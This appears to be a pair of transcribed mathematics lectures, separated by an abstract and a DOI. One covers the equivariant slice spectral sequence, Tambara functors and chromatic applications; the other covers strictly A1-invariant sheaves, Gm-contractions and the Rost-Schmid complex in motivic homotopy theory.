So I brought this up because just doing these computations, understanding the homology of these spheres, the k times C spheres as k varies, gets you a lot of mileage equivariantly. So I'll start with a theorem, and this is due to lots of people individually. I'm going to say that the first parts of this are due to Dugger, to Hu-Kriz, and to me, Hopkins, and Ravenel, and the motivic version of the statement is due to different people, there it's due to Hopkins and Morel, and others. And the theorem is that there's a filtration on the C2 spectrum of Real bordism, MU_R, or again, if you're coming from the motivic context, you should think of this as MGL. There's a filtration on MU_R with associated graded Gr(MU_R) given by the Eilenberg-MacLane spectrum associated to the constant Mackey functor Z, with a bunch of formal indeterminates adjoined, where, just like in Dan's talks, the indeterminates are graded by representations, or in this case bi-graded, since I have two irreducible representations: the degree of the i-th one is just i times C, where again I'm using the complex conjugation action on C. What this means is that if I want to compute the MU_R homology or MU_R cohomology of some space or spectrum X, then I have a spectral sequence. The E2 term is given by, well, say the homology, but I'll write it this way: the homotopy Mackey functors of the function spectrum from X into HZ adjoin these indeterminates, which is just the homology of X with coefficients in the constant Mackey functor Z, with a bunch of indeterminates adjoined. And this spectral sequence converges to the MU_R cohomology of X. So it's like an Atiyah-Hirzebruch spectral sequence, but I'm using a different filtration, and the filtration is the slice filtration, named after the motivic slice filtration of Voevodsky, which was set up equivariantly by Dugger initially. Okay, so what I want to focus on, and I'm seeing that time quickly passes, is that this is a spectral sequence of Mackey functors. This is the first-order approximation to understanding the way I can do equivariant computations. Mackey functors form an abelian category, which means I can talk about spectral sequences of Mackey functors. And in this case, what does that mean? We have two spectral sequences: there's the fixed-point one, the value at a point, and there's the underlying one. And they're connected: I have a map of spectral sequences reflecting my restriction map from the fixed one to the underlying one, and I have a map of spectral sequences from the underlying one back to the fixed points. And the underlying one is actually a spectral sequence of C2-modules. So I have all of this added structure that comes in. It's a lot of added structure, but it's not an insurmountable amount. The biggest thing I can do is use the fact that since these are maps of spectral sequences, if I have a class that's a cycle, or maybe a permanent cycle, then its image under any map of spectral sequences is a cycle or a permanent cycle; and if I have a class that's the target of a differential, then under a map of spectral sequences it's still the target of a differential. So I get a lot of additional constraints on this.
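Roughly in symbols, with my own placeholder names \(\bar b_i\) for the polynomial generators (degree conventions vary in the literature), the statement above reads:
\[
\mathrm{Gr}\big(MU_{\mathbb{R}}\big) \;\simeq\; H\underline{\mathbb{Z}}\big[\bar b_1,\bar b_2,\dots\big],
\qquad |\bar b_i| \;=\; i\cdot \mathbb{C} \;=\; i\,\rho_{C_2},
\]
\[
E_2 \;=\; \underline{\pi}_{\bigstar}\,F\big(X,\ H\underline{\mathbb{Z}}[\bar b_1,\dots]\big)
\;\cong\; \underline{H}^{\bigstar}\big(X;\underline{\mathbb{Z}}\big)\big[\bar b_1,\dots\big]
\;\Longrightarrow\; MU_{\mathbb{R}}^{\bigstar}(X),
\]
a spectral sequence of Mackey functors, with the five-pointed star indicating the RO(C2)-grading discussed just below.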
So as just an example, in the spectral sequence computing the homotopy Machi functors of MUR, the ideal generated by 2 is an ideal of permanent cycles. And so why? It's just because two times any class X, remember, I'm looking at something where I started with the constant Machi functor Z and in the constant Machi functor Z, 2 was the transfer of 1 in the underlying. And then I have this Frobenius reciprocity condition. Let's me move the X inside. This is the transfer of 1 times the restriction of X. So this is the transfer of the restriction of X. And in the underlying spectral sequence, the underlying spectral sequence is just the ordinary Atiya-Hirzberg spectral sequence computing the homotopy of MU out of the homotopy of MU. So it collapses with no extensions. And the restriction here is a permanent cycle. Oops, it's not useful always. So that's giving me a huge amount of information about the structure of the spectral sequence that I don't know how I would have known otherwise. I needed that this large number of classes, namely twice anything, could actually be written via the Machi structure as a permanent cycle. Okay, so in the time remaining, I need to push into bigger groups and I need to talk a little bit about the the the structure. I've already started to dance around some of this. First, you'll notice I used a different wild card here than my asterisk. I used a five-pointed star. Here, here, here, and then here I just used the ordinary asterisk. So this one, this wild card was following notation of who increased. This is the ROC2 grading. So I actually have more information that I have at my fingertips. And second, I talked about an ideal here, which says that I should be thinking about this actually as a spectral sequence of rings. And that's true, but I won't go too much into it. So in fact, the slice spectral sequence is a spectral sequence of commutative monoids in Machi functors. And these are called green functors. Sean asks if there's a that there's a result saying differentials are power operations. Yes, yes. The maybe the best way to say what the differentials are in the classical ATIA here's a spectral sequence is that they're cohomology operations because they're maps connecting between Annenberg-McLean spectra. And here in for for something like MUR, the fibers are again suspensions of Annenberg-McLean spectra. So the initial differentials are exactly cohomology operations, in this case from cohomology with constant Z coefficients to itself. And then all of the higher differentials can be expressed as secondary or or higher order operations, just as we would see with the ordinary ATIA here's a book spectral sequence. In this case, it's a it's a consequence of knowing the form of the spectral sequence, knowing that the fibers are all these generalized Annenberg-McLean spectra. But yeah, I can think of them in exactly that way. Okay, so I'm in that the time remaining, and I've said that already, I want to do one last added bit of structure. So here I've used that the Mackie structure shows up, and it gives me a way to produce a bunch of permanent cycles, and to transport differentials. Then I know that this is a spectral sequence of these ring objects, these green functors. So I understand that at each page, I have a ring and for each g mod h, I have a ring, the restriction maps are all ring maps. And so I can use all of this to to continue to bind classes to other classes and simplify the problem. The last part is to use the norm. 
So we have also multiplicative transfers. And these are actually arising from functors quite generally on on the complete spectra. So I have a norm functor from H spectra to G spectra. And this is a symmetric minoidal functor that's going to take some E, and you should think about it as going to, I'm going to smash together g mod h copies of E. Ie, this is a tensor induction. And these norm maps have the property that since the tensor product is the co product on commutative rings, I have canonical maps. I have canonical maps for any commutative ring. In G spectra, I have a map from the norm of the restriction of R back to R. This endows the homotopy Mackey functors of R with these external norm maps. And here I have to use the grading by the representation grid. Oops. So just as earlier when I talked about the sum over the bio group or the sum over G being the trace, I'm using the Galois theoretic language there. Here I'm also using the Galois theoretic language. You should think of this as being as being heuristically the product over G mod h of some element. And since my ring is commutative, if the group is acting by permuting now the tensor factors around, but the multiplication is actually commutative, so it doesn't care what order they were in. This gives me a way to take an element that's fixed by H and produce an element that's fixed now by G. This structure was first studied by Tambara who looked at these and called them TNR functors, these sort of Mackey functors together with multiplicative transfers. And the last result is the slice spectral sequence is a spectral sequence of Tambara functors. This one, I don't know how to show this in the motivic context. The analogous operations, the analogous norms and normed motivic spectra were done by Bachman and Hoy-Waugh. They described how you can think about the norm maps and how to build these added norm, external norm maps on commutative monoids in this context. And I would expect that the slice spectral sequence should have this property. In the equivariant context, the somewhat surprising feature is that the slice filtration is actually the universal filtration that has the property that it takes commutative monoids in spectra to a spectral sequence of Tambara functors. And if there are questions about that afterwards, I'll answer it. So I saw you pop in, so I know that I'm almost out of time. So let me just say a punchline. And that is what the hell does it mean to be a spectral sequence of Tambara functors? So it means that we have... So I was popping for questions, but you can take times. Oh, okay. I reserve my question. All right. So we have a twisted version of the Leibniz rule. And let me just spell that out in one case. So I have the... I just need to listen. I have the differential on some class that I'll write as the norm of x. Again, heuristically, so I'll do this in a different color because this part's a lie. This is supposed to be x times the conjugate of x. And then I know from the Leibniz rule how to compute the differential on a product. This is the differential on x times gamma x plus x times the differential on gamma x. Remember, the differentials were maps of Machi functors, so I can pull the vial action out. So this is dx times gamma x plus x times gamma of dx. And this is the same thing then as 1 plus gamma on x times... Oops, not the one I want to do. dx times gamma x. And now I can make this true statement, which is the transfer of dx times gamma x. 
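The manipulation just performed, under the heuristic that N(x) "is" x times its conjugate, can be recorded as follows; the first line is only a restatement of the norm-forget setup above, and the quotation marks flag the heuristic step.
\[
N_H^G\colon \mathrm{Sp}^H \to \mathrm{Sp}^G \ \ (\text{tensor induction}),
\qquad
N_H^G\,\mathrm{res}^G_H R \longrightarrow R \ \ \text{for a commutative ring } R \text{ in } G\text{-spectra},
\]
\[
d\big(N(x)\big) \;``="\; d\big(x\cdot\gamma x\big)
\;=\; dx\cdot\gamma x + x\cdot\gamma(dx)
\;=\; (1+\gamma)\big(dx\cdot\gamma x\big),
\]
and since the differentials are maps of Mackey functors and \(1+\gamma\) on an underlying class is heuristically \(\mathrm{res}\circ\mathrm{tr}\), the honest statement, as in the talk, is \(d\big(N(x)\big)=\mathrm{tr}\big(dx\cdot\gamma x\big)\).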
So this is the version of the Leibniz rule that shows up in this case. The differential on the norm is just like on a product, but I'm supposed to remember that the norm was a kind of product where the group permuted the factors around, and so the differential takes it to a sum where the group now permutes the summands around, and that's exactly the role of the transfer. You can do better, though. That was saying something just about d_n of the norm, the usual Leibniz property. And so, this is the very last thing I'll say: you can do better. If d_n of x, now in my slice spectral sequence, is y, then I actually get a longer differential: d_{2n-1} of a_sigma times the norm of x is the norm of y. For this I don't know a classical antecedent. It's saying that once I put in this a_sigma, the differential almost behaves like a ring map, at the expense of shearing it from d_n to d_{2n-1}. So it's like saying: if I know the differential on x is y, then there's some kind of differential on x squared that looks like some kind of y squared. And these collections of properties that I've described are the way that people are doing computations with these spectral sequences. So I think I'll stop there. Okay, so first, Mike, thanks a lot for the nice talk. So let's fire the first question. Can you read it, or do I read it? Yeah, so Sean asks: couldn't I view a_sigma^n and N as two different power operations? And then it would look like some of Bruner's work. Yeah, I think that's exactly the way that I want to do this. I should be able to connect a_sigma^n times the norm to some kind of, actually in this case, Dyer-Lashof operation, because I'm looking at an operation on homology. But I don't quite know how to make that work; I'd love to talk to you more about it. Sean also asked: do these norms prolong to the category of filtered equivariant spectra? Yes, they do. Yuri asks: is the universal property of the slice filtration written down anywhere? I don't think so, but I don't recall. Oh wait, maybe in the chapter I wrote for the Handbook of Homotopy Theory; I believe I talked about the universal property of the slice filtration there, so thank you for making me remember that. And then an anonymous attendee asks: could I mention some of the applications to chromatic homotopy, as promised in the abstract? Also yes. So, the applications of some of this, and I'll be quick. First, let me recall a theorem of Hahn and Shi, which says that the Lubin-Tate spectra E_n, for any n, are Real orientable. In other words, I have a map of ring objects in the homotopy category from MU_R to E_n. Knowing this, if n is 2^{k-1} times m, then the Hopkins-Miller theorem says that C_{2^k} acts on E_n, which gives me, via the norm-forget adjunction I described above, a map from the norm from C_2 up to C_{2^k} of MU_R into E_n. That's again a map of ring objects, but now in the homotopy category of C_{2^k}-spectra. And then recent work of Beaudry, me, Danny Shi, and Mingcong Zeng says that you can use this to build a model for E-theory: E_n as the K(n)-localization of some quotient of MU_R. And to spell out exactly what that is would take me a little far afield.
But the important thing is the slice spectral sequence here has a describable, a more understandable example. E 2 and then etc terms. Then the corresponding Lubin-Tate theory had. We knew the C 2 action on E n, but being able to describe the C 2 to the n action on E n in a way that we could write down the homotopy fixed point spectral sequence, that was, that was sort of the, the bloody edge of the state of the art. Using these sorts of equivalent methods and stepping through the norms and these sort of quotients of the norms of M U, the slice E 2 term is very easy to write down and to describe. And then you can use the techniques that I was describing over the course of the talk to sort of bootstrap differentials, inducting up over the order of the group and use this to get a lot of information about the homotopy groups of the Hopkins Miller spectrum in ways that we never were able to before. Okay, so, so I have a question. What's the link between Tambara and Greenfunktors? There's a forgetful functor. Every Tambara functor has an underlying Greenfunctor. So a Tambara functor you can think of as a Greenfunctor together with these additional multiplicative norm maps. And then there's actually just as there was a hierarchy that started with coefficient systems and it ended in Mackie functors where I start to put in more and more transfers. There's a hierarchy between Greenfunctors, which are Tambara functors with no multiplicative transfers, all the way up to Tambara functors, which have all multiplicative transfers. And this hierarchy, I can, it's exactly analogous to the additive hierarchy for the Mackie functor case. And this is, this is an important feature. So thank you for bringing it up. Zyrsky localization does not work well in Tambara functors. So for equivariate commutative rings, Zyrsky localization doesn't preserve the property of being a commutative ring. It does always preserve the property though of being sort of the spectral version of a Greenfunctor. So an algebra over an E infinity operat. But it's, it's a very particular kind of E infinity operat, one in which the group doesn't act. And so that's a subtlety that shows up and makes some of the computations a little trickier. Okay. So and also I have a kind of maybe vague or broader question. So, so you describe Mackie functor and they are defined for finite groups, but is there a theory for other groups? So first example would be profite groups like Galois. Yeah. Yeah. Yes. And there are several, several versions of these for the, the cases that were most studied in classical homotopy theory were compact Lie groups where again, we have a good notion. And there, and you have Mackie functors for a compact Lie group, and they're describing the homotopy groups of a genuine G spectrum for G compact Lie. They're the multiplicative version of these only shows up for finite index. So pairs of finite index subgroups. There's no sort of degree shifting part that can show up in the, in the compact Lie. For profite, Dresden-Ziebenacher have a, a bit vector construction for, for, for sort of profite groups that's generalizing that ordinary bit vectors. And they're describing the profite version of the Burnside ring in that case, because the bit vectors, the bit vectors of Z is, is where the truncated bit vectors are exactly giving me the various Burnside rings as I look for like C and or whatever my truncation system was. 
Barwick also in his spectral Mackie functors has a really beautiful approach to understanding the profite case of a Mackie functors as well. Beyond this, you can, nothing, nothing that I was writing down really depended on, on the group being finite. I could still talk about finite G sets for G not finite. I start to run into pathologies like if G is divisible, there aren't any interesting finite G sets. And then I'm going to start to run into trouble. But aside from, from those cases, you can talk then about, you can talk about Mackie functors, you can do all the same thing. Last question I was also thinking about, I don't know if you know these Ros cycle modules. So it looks really like Mackie functors, but there are two operations that are added. So it's kind of multiplication by unit and residue maps for valuations. And it, it, it, it made, it could met, you, we could see that as Mackie functors for the so-called Motivique Galois groups, where you have transcendental extension. So have you seen something like that? And I guess, I haven't, but, but that's a, that's an interesting thing. I'll think about that. I think one of the reasons that I wanted to question. Yeah, yeah. One of the reasons I wanted to give this talk is I think a lot of the techniques that we've been using in the, recently in the ecu variant context should port through without change into the Motivique one, all the stuff that we've been seeing with the multiplicative transfers, anything showing up in the, in the Bachman-Hoywa normed Motivique spectra. We should have analogs of these two kinds of conditions on differentials in certain spectral sequences. And this last one, the one that changes degree, it's allowing you to lift differentials multiplicatively in a way that's, that can actually be pretty surprising to get new ones. So I'd love to see the analog of that, um, Motivique. Okay. So it seems we have no more questions. So again, Mike, thanks a lot for a nice talk.
|
Foundational work of Hu—Kriz and Dugger showed that for Real spectra, we can often compute as easily as non-equivariantly. The general equivariant slice filtration was developed to show how this philosophy extends from C2-equivariant homotopy to larger cyclic 2-groups, and this has some fantastic applications to chromatic homotopy. This talk will showcase how one can carry out computations, and some of the tools that make these computations easier. The natural source for Real spectra is the complex points of motivic spectra over ℝ, and there is a more initial, parallel story here. I will discuss some of how the equivariant shadow can show us structure in the motivic case as well.
|
10.5446/50930 (DOI)
|
Well, I mean, thank you very much for the invitation to speak here and for organizing a summer school in my living room. It's super convenient. Excellent, guys. Okay, so the title is maybe a little bit cryptic, but I, right, so maybe I will convince you hopefully that the result is not so much. Okay, so let's try to get there. So first of all, of course, well, that's why I prepared the first few things, which I want to say because they are all obvious because you've been listening for more than five minutes. So I will, what I want to talk about is some results in motivic homotopy theory. So I'm interested in this category of motivic spaces. What's a motivic space? Well, it's a special kind of pre-sheaf valued in spaces. And so a pre-sheaf on the category of smooth varieties and such a pre-sheaf, which happens to be a sheaf. So I will always be dealing with misnavage sheaves. This is a typology. Well, it's some sort of topology, which is somehow relevant. It's the correct one for various reasons. It doesn't matter hugely right now what it is. And then of course, there's going to be some extra condition because it would be silly to have like two names for the same thing. And the extra condition is this so-called A1 invariance, right? So you just, you look at all those sheaves F such that if you evaluate it on some smooth variety X, or if you evaluate it on X times A1, you get the same thing. And this is the so-called category of motivic spaces. So there are of course, supposed to be lots of motivic spaces because supposedly studying this category will tell us good things about the world by which I mean polynomial equations. So for example, if I take any smooth scheme whatsoever, then I can try to, well, it will not usually as a pre-sheaf, of course it will live here, but it may not be here. But you can just sort of brutally move it into this category because this inclusion has a right adjoint which is called the motivic localization. And that's, that's, that's the obvious thing to do. And usually I will not even write this L mode and I will not write this unada embedding thing. I will just say view X as a, well, this is not what I was going to say. What I want to say is I want to view X as a motivic space. And this just means that you should do this localization, which in general is of course highly non-trivial. But I want you to please imagine doing it. And then there's, there's another class of examples, which is going to be very important for my talk, which is let's say you take some sheaf of a B in groups, right? So in this category here, you take some of the simplest possible objects. Well, of those which are, I mean, you do write some not sheaves of spaces, you now make them zero truncated, but you give them some extra structure. This is a B in group structure. So that seems like a pretty reasonable thing. And then you could ask, is it the case that this, that this sheaf actually lives in the category of motivic spaces? And I mean, that's not always true. There's a condition and I mean, it's just this condition here, but maybe for a sheaf of a B in groups, this looks a little bit more familiar. It just says that if you take F, you evaluate it on X or you evaluate it on X times A1. And you should just get the same a B in group. Okay. So this maybe was not very exciting. So what else can you do with a B in groups? Well, you can look at their Eilberg-McLean spaces or in this case, I can look at the Eilberg-McLean sheaf KNF, right? 
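Since the next part leans on these definitions, here they are in compressed form; L_mot is the motivic localization mentioned above, and the model-categorical details are suppressed. The second line records the two invariance conditions in play here and in the next paragraph.
\[
\mathrm{Spc}(k) \;=\; \Big\{\, F \in \mathrm{Sh}_{\mathrm{Nis}}\big(\mathrm{Sm}_k\big) \ \Big|\ F(X)\xrightarrow{\ \simeq\ }F(X\times\mathbb{A}^1)\ \ \forall\, X \in \mathrm{Sm}_k \,\Big\},
\qquad
L_{\mathrm{mot}}\colon \mathrm{Sh}_{\mathrm{Nis}}\big(\mathrm{Sm}_k\big)\to \mathrm{Spc}(k),
\]
\[
F(X)\cong F(X\times\mathbb{A}^1)\ \ (\text{homotopy invariance}),
\qquad
H^i_{\mathrm{Nis}}(X;F)\cong H^i_{\mathrm{Nis}}(X\times\mathbb{A}^1;F)\ \ \forall i\ \ (\text{strict homotopy invariance}).
\]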
So this is going to define some sheaf of spaces by definition. And then I can ask again, does it live in this category of motivic spaces? And well, you need this homotopy in various property. And what does it mean to evaluate some, some Eilberg-McLean sheaf on a smooth variety? You get some space. The homotopy groups of which are the homology groups. So in this case, the condition is that this homology, HI of X times A1 with coefficients in F should be the same thing as the homology X with coefficients in F. And this should hold for all I less than or equal to. And so you see, in principle, as you make this N bigger, you get somehow a more interesting object and you get, get a more stringent condition. And then it's somehow natural to single out those pre-sheafs or those sheaves of a BN group so I can do this for all N at the same time. And those are called strictly A1 invariant. Right. So let's, let's just leave it at that. Okay. So now we come somehow to, to something which is close to the heart of the whole thing, which of course, classically, you have this notion of connectivity of space. I already implicitly used it by saying that like an Albert McLean space is somehow particularly simple. And what, what, what is, what this has to do with is that you some sort of sphere and you build how you can attach spheres to your spaces, for example. And more typically we somehow we have two spheres again. I'm sure you know this, right? So that's the usual sphere, usual circle if you want. Sir. Sir. Sir. And then there's somehow some algebraic circle, which is denoted GM. And I mean, it's just you take the complement of zero in the affine line and let's say you point at one and then these spheres, they define your point of motifs spaces, which, well, they're, they're a bit like spheres somehow. For example, I mean, the complex points, of course, of GM is just C minus the origin, which has the homotopy type of S1. So it looks like it's just the same thing. That somehow this is a very topological observation and algebraically, they're different. And then what this tells you is that you somehow get two notions of connectivity out of this whole thing, right? You can measure connectivity somehow in terms of S1 or you can measure it in terms of GM. And I mean, there's no reason for this, for these to agree in general. Now I just said there's no reason for them to agree. So let me contradict myself. So here's an important example. If I take a smooth scheme and I take some closed up scheme, but it doesn't have to be smooth. And but I will assume that it has a co-dimension at least D everywhere. And if you do this, well, I mean, whether you do this or not, you can look at sort of the formal tubular neighborhood of C and X, right? So I do this thing X mod X minus Z. Right? So X is a smooth scheme. So it defines a motivic homotopy type and X minus C is a smooth scheme defines a homotopy type. So I can take the co-fiber of the inclusion, just define some motivic homotopy type. And yeah, I mean, if Z was smooth, then you should think of this as some sort of algebraic version of a tubular neighborhood. And if Z is not smooth, then I know it's this algebraic version of a tubular neighborhood, but maybe a bit harder to imagine. And it turns out that this guy, I mean, if I view this as a pointed space, this is D minus one connected. D minus, that's not very good. D. And well, it's a D minus one connected in the S1 direction or in the GM direction. It turns out in both directions. Okay. So how do you see this? 
Well, first is let's say that the Z is smooth. And then there's something called the homotopy purity theorem, which basically says that this really does behave like a tubular neighborhood. And it tells you that it looks basically like a tomespace of some, I mean, like the tomespace of some vector bundle. And so it means that locally somehow it looks like this sort of thing, a1 mod GM, which is P1 and which is somehow, which is S1 smash GM. So the point is locally it looks like it's connected, or I mean, if it's dimension D, then it's going to be S1 to the, I mean, it's SD smash GM to the D. And so locally it looks connected in both directions. And then somehow the way the topology works, this is the name which topology works in the TLCMU theory is that this also implies that it's globally connected in the sense. And so what if Z is not smooth, it turns out that there's some sort of filtration argument and you find that this result is still true. Okay. So this will somehow play a big role in what is to follow. And now we can look again at our favorite strictly homotopy invariant sheaves, right? So abstractly homotopy invariant. Right. So then my F defines a particularly simple type of motivic space. And then what happens is that this space is discrete in the S1 direction. Okay. So it looks like the simplest possible thing which you could deal with in this direction, but it doesn't have to be in the GM direction. So somehow there's some, some, some structure going on, which is masquerading, but yeah, so it's not immediately obvious, but it turns out that there's some more things going on. Okay. But not in general in the GM direction. And I mean, I'm not sure that have anything. That's a question for you, Tom. Yes. I saw the question, is there a nice reference for this filtration argument when Z is not smooth? Probably, but not off the top of my head. So I mean, also when I make this claim, I'm saying that it's going to happen in the category of S1 spectra. If you know, like these sorts of details, I'm not claiming this in the sort of completely unstable sense if I want to be very precise. So I'm sure I can find you one. If you email me, I can find something, but not right now. If I clearly remember something is at the end of Röndig's erstware advances mass paper, but at the end of the paper, this filtration argument. Okay. Thank you. Yes. Okay. So I was, I was trying to explain why it's not always the case that these guys, right? So if I take one of these guys, why is it not always somehow connected in the GM direction? And I mean, I think just because there's no reason for it to happen, right? There are these two directions and you picked something which by definition was sort of discreet in the, in the one direction. Why would it be in the other direction also? So you can just work out some examples and you see that this happens. So let me introduce some notation. So in general, let's see sort of a spectrum. For example, it would be discreet if and only if it's loops vanish, right? So it seems important to study the GM loops of this guy. So if this is always zero, then we would learn that these guys are always somehow discreet in the GM direction, but it's not. So let's give you the name. This is called F minus one. That's why we have this contraction, construction. And the point is that this need not be zero. And they, right? So now let me just give you an example. So what you can do is you can work out, this is not totally trivial. 
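Two statements from the discussion above, written out; the Thom space description is the homotopy purity theorem for smooth Z, and the connectivity claim is the one asserted for general Z via the filtration argument referenced in the chat.
\[
Z \subset X \ \text{smooth, closed, codim } d:\qquad X/(X\setminus Z)\ \simeq\ \mathrm{Th}\big(N_{Z/X}\big),\qquad
\text{locally}\ \simeq\ (\mathbb{P}^1)^{\wedge d} \simeq S^d\wedge \mathbb{G}_m^{\wedge d},
\]
so for any closed Z of codimension at least d, the pointed motivic space X/(X minus Z) is (d-1)-connected in both the S^1- and the G_m-direction; and the G_m-loops of a strictly homotopy invariant sheaf are written
\[
F_{-1} \;=\; \Omega_{\mathbb{G}_m} F .
\]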
This F_{-1}, this contraction, this loop space is again just a sheaf, and its sections over, let's say, K are given by F(A^1_K minus zero) modulo F(K); you can put X instead of K in an obvious modification of this formula. And there are some strictly homotopy invariant sheaves which we know. For example, the Witt sheaf: you take the presheaf which assigns to a smooth variety its Witt group, or Witt ring, and then you take the associated sheaf in the Nisnevich topology. This turns out to be strictly homotopy invariant, which is not obvious. And what one can manage to compute is that if you do this contraction business, you just get the Witt sheaf back again, and this is not zero. Another very famous example is the Milnor-Witt K-theory sheaves K^MW_n, the unramified Milnor-Witt K-theory. Their contractions are never zero, and they fit together into an infinite G_m-loop sheaf. Okay. So this is just something which happens, and which may be surprising at the beginning, but we have got to live with it. Now I want to put on my topologist's hat for a little bit and think about loop space theory. One slogan which I have picked up is that taking loops increases structure. What do I mean by this? Well, if X is a topological space, let's say pointed, and I take the usual loop space, then this has more structure, because loops can be composed. In other words, this is some sort of monoid, and if you want to be fancy, an E1-monoid, or A-infinity. This is the beginning of classical finite loop space theory. If you take higher loops, putting an n there, then you get an E_n-monoid. And the point is that in fact this extra structure recovers everything; that's the crux of finite loop space theory, at least its most basic result. So now what I want to claim is that if I do the same thing with my strictly homotopy invariant sheaf F, and I take loops in the G_m direction, I still get more structure. So let's take F strictly homotopy invariant, and let me look at the first loop sheaf, which I will denote F_{-1} for reasons of tradition. Now what is almost clear is that this is going to be a module over the stable maps from G_m to G_m, and the point is that this thing has been computed by Morel to be the Grothendieck-Witt ring GW(k). So what you learn is that this F, which was just some arbitrary strictly homotopy invariant sheaf someone has given you, once you contract it down, suddenly everything becomes a module over the Grothendieck-Witt ring, which can be a moderately complicated ring. It's just some extra structure which drops out of the sky, and maybe it will be useful. And there's also more: there's also something which I would call monogeneous transfers, and I don't want to go into too much detail about exactly what this is. What it does is: if you have some field, say finitely generated over k, and then you have some finite monogeneous extension, so a finite extension with a chosen generator x, then this yields a transfer map tau_x from F evaluated at K(x) to F evaluated at K.
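A compact summary of the structure just listed, in the notation of the talk; the transfer depends on the chosen generator x, as emphasized above.
\[
F_{-1}(X) \;=\; F\big(X\times(\mathbb{A}^1\setminus 0)\big)\,/\,F(X),
\qquad
\big\{\mathbb{G}_m,\ \mathbb{G}_m\big\} \;\cong\; \mathrm{GW}(k)\quad(\text{Morel}),
\]
so F_{-1} is canonically a sheaf of GW(k)-modules, and for a finite monogeneous extension \(K \subset K(x)\) of finitely generated fields there is a transfer
\[
\tau_x\colon F\big(K(x)\big) \longrightarrow F(K).
\]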
Right, so this is somehow some fancy way of adding things together in some special way. And we will see later some other incarnation of this. But all I'm saying is that, right, so also in our motivic setting, it turns out that if you do take GM loops, you do find more structure. And so what I was saying here is that, classically, if you recover enough structure, then somehow this loops, then you can reverse this loop operation, right? So I do this omega n thing, and it goes, let's say, from n minus 1 connected spaces. And then I go to en monoids. Monoids, as I said. This is somehow some way of encoding the fact that the first loop space has a multiplication. The second loop space, the multiplication becomes commutative. And then higher loop spaces becomes more and more commutative. This is actually in equivalence. So if you give me only the en monoid, which was the loops on your space, then I can actually reconstruct this space. And I mean, you just gave me everything. OK. And so what this tells you, for example, is that, whoops, why is this not OK? Right, so if you have some, if x is n connected, maybe it's n minus 1 connected, then, and y is arbitrary, then if you do maps from x into y, well, first of all, it is only depends on the n minus 1 connected cover of x. Yeah, of y, only on x and, well, sort of the n minus 1 connected cover of y. But then, of course, I can, I've already learned that n minus 1 connected cover only depends on the loops. So I can put an omega n here and I can forget about the covering, whatever. Doesn't change anything as an en monoid. OK, so this is maybe a bit of an esoteric observation. But if you do make this observation, you could. I mean, right, so now we have a motivic homotopy theory and how does this work? Well, usually something which works classically has an analog, hopefully, emotively. And then sometimes, if you're very lucky, you can prove this analogous thing. And then it gives some interesting result about algebraic varieties. That's somehow secretly the plan of our motivic homotopy theory is supposed to be useful. So now let's try to think about this analog while you might guess the following thing based on that. So I put some motivic space here, which is highly connected. What do I take? Well, I take my x mod x minus z, right, from the first example. Core dimension of z greater than or equal to z. And now I'm going to map it into something else. And let me put k and f here. Right. And so now remember, this guy here is d, so it should be a d. So this guy here is d connected in both directions. So if you believe that this analog somehow should told, it tells me that this set of map, I mean, this homotopy classes of maps thing, it should only depend on the default loop space of this guy in both directions with its extra structure remembered. OK, so it only depends on. Well, if I take the default loops in the S1 direction here, I just get back f. And I remember that it's the chief of a billion groups. And then if I take the default loops in the GM direction, I get f minus d. F minus d with its extra structure. Oops. What did I do? OK, so we have to somehow figure out what we think is all the possible extra structure. And what we think is all the structure, i.e. the transverse plus GW module structure. I mean, of course, we don't know this. Maybe there's more, which nobody has discovered. But unless you provide me with more structure, which could possibly depend on, I will just guess maybe that's all there is. And it turns out that that's true. 
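Here is the "topological guess" of the last two paragraphs in one formula, together with the shape of the complex that will justify it below; the twist data in the terms is suppressed, which is why the talk calls the description morally rather than literally true.
\[
Z\subset X \ \text{closed},\ \operatorname{codim}\ge d:\qquad
\big[\, X/(X\setminus Z),\ K(F,d)\,\big] \;\cong\; H^d_Z(X;F)
\quad\text{depends only on } \big(F_{-d},\ \mathrm{GW}\text{-module structure},\ \text{transfers}\big),
\]
\[
C^d(X;F)\ ``="\ \bigoplus_{x\in X^{(d)}} F_{-d}\big(\kappa(x)\big),
\qquad
H^d_Z(X;F) \;=\; H^d\Big( 0 \to \bigoplus_{x\in X^{(d)}\cap Z} F_{-d}\big(\kappa(x)\big) \to \bigoplus_{x\in X^{(d+1)}\cap Z} F_{-d-1}\big(\kappa(x)\big) \to \cdots \Big).
\]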
So we do not have motivic finite loop space theory; certainly we do not have that in general. But of course this is an extremely special case, and you might imagine testing it by other means. And you can: it follows from a theorem of Morel. Before I do this, let me observe that this set of homotopy classes actually has a more classically algebraic interpretation, because it's just the same thing as taking cohomology. Mapping into this Eilenberg-MacLane object is taking cohomology, so this is some H^d of something with coefficients in F, and since I'm mapping out of X mod X minus Z, it's the cohomology of X with support in Z. So the topological statement says that this cohomology group with support only depends on the contraction. And once you know some things about motivic homotopy theory, you will see that this is true, but because of some difficult results. So Morel proves that the so-called Rost-Schmid complex, and now we get to the title, looks a bit like this: you take your F, you view it as a sheaf on the small Nisnevich site of X, and then you can resolve it, so you get C^0(X, F), then C^1(X, F), and it keeps going, and this computes cohomology. Okay, this is not super helpful yet; I will try to answer your question in a second, Sean, because I need to tell you something about what these C^i's are. So roughly, what are these C^i's? Roughly, C^d(X, F) is going to be the sum over all the points of codimension d in X of the d-fold contraction F_{-d} evaluated at those points. This is not literally true, but it is morally true. And then there's a differential, and it uses transfers and so on, but you can check things explicitly. So now, what does it mean to take cohomology with support in Z? It just means that I have to sum not over all points of codimension d, but only over those inside Z. And the effect is just that the terms up to C^{d-1} go away: this one goes away, this one goes away, and so on. So you find some complex, and its terms start with F_{-d} of something, then F_{-d-1} of something, and so on and so forth. And you can convince yourself that also the differential, which has some explicit form, it says: you do something, you put it back here, and you transfer, and you multiply, and it's a big mess, but you never use anything which is not already encoded in F_{-d}. And that's how you see that this topological guess turns out to be true. So now I have a question in the chat: can we view the extra structure as coming from the fact that H^d with coefficients in F is a group? I don't think so. It's important that you do this with support; it comes from the fact that you're supported in high codimension. As for the extra structure on F_{-d}, I still don't see how to get that out of the fact that H^d with coefficients in F is a group. It comes from the fact that G_m has special self-maps, which give you a special structure on the loop space. So I don't see how this is really related to the cohomology.
